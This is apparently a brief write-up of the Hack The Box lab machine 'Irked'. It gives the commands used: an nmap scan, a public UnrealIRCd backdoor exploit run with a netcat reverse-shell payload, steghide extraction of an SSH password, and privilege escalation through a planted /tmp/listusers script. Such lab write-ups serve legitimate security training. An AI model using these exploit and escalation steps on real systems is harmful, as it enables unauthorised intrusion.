I remember my site’s user password :).
| Machine Name | OS | Category | Difficulty | Link |
| Irked | Linux | Vulnerability Assesment- | Easy | Link |
First of all I scan to target machine with nmap tool.
nmap -sV -Pn -p- 10.10.10.117
I search the port versions whether be vulnerable or not and UnrealIRCd is vulnerable. I found a exploit that produce to get a reverse shell in the github.
git clone https://github.com/Ranger11Danger/UnrealIRCd-3.2.8.1-Backdoor.git
python3 exploit.py 10.10.10.117 8067 -payload netcat When I use the exploit, I get the shell(You can change ip in exploit for reverse shell with your ip).
After A a half hour, I find the clue in the .backup file.
This can be image’s password that seen in the website’s index page. I can extract the image with stagehide and The image want a password to extract and I enter the password.
steghide --extract -sf irked.jpg
It has been found password to ssh and I connect the target machine via ssh.
password=Kab6h+m+bbp2J:HGssh djmardov@10.10.10.117
I upload the linpeas to target machine and run the file to find priviliage esclation.
viewuser is intresting like linpeas say.
I execute the tool and I get the error that no file /tmp/listusers
I create the file as a name listusers and write bash to the listusers file
I give a permission to executing the file with chmod +x listusers.
I execute the tool.
Finally I got a shell.
